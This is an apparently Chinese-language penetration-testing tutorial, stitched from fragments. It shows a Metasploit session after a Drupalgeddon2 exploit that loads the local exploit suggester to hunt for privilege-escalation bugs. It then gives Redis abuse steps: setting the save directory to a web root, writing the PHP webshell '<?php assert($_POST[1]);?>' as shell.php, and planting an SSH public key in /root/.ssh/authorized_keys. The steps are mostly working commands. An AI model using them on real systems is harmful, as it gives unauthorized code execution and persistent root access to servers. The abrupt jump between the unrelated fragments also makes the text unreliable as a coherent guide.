msf6 exploit(unix/webapp/drupal_drupalgeddon2) > search suggester
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester
Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester
利用这个后渗透测试模块,进行搜索 可用的提权漏洞 。
复制代码
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > use 0
msf6 post(multi/recon/local_exploit_suggester) > show options
Module options (post/multi/recon/local_exploit_suggester):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
SHOWDESCRIPTION false yes Displays a detailed description for the available exploits
# /opt/lampp/htdocs/security
config set dir /opt/lampp/htdocs/security
(2)修改持久化文件名字
#根据web环境 进行确定文件名
config set dbfilename shell.php
(3)向持久化文件中写入木马
复制代码
set 1 "<?php assert($_POST[1]);?>" #持久化 save
(4)测试
2、利用公钥和私钥登录
(1)生成公钥和私钥
ssh-keygen -t rsa
(2)设置redis的持久化文件的路径和名字
config set dir /root/.ssh # 设置路径 如果当前root下 没有`.ssh` 自己创建一个
config set dbfilename authorized_keys # 设置持久化文件的名字
save
(3)把公钥内容存储到持久化文件中
set 1 "\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8ISztK16CwYNbXoeWPtkT/4sxDQsXZ9+wYP3jTb49qS1x2AMedTOsEfK+4toIOk43UcT5PnSpve9Dr2i5qD+QMkQmv+PQ5Uy0MvF602jEol7JqgENuzgIxEdqjHooBIgK7xkRw438bUNQG6qZzhQic7l5AisxOGi9I472x5d9IbDp+W5goK+n2ZRtdX4uUeRBm/V8EAOvWUBQwXfDnu9F3B//gSrgbkTRvX/uOduo3hdRpBVuCmJBwOhS3+AZkEoymuascoQHelKcy5RdF/9sj/It2PhcX0+8ydCV6GTlityHmCZO2H1vnjfj4p6nZEW3xavQrw9g3tmVwRK4nov3 administrator@DESKTOP-MKGGU1P\n\n"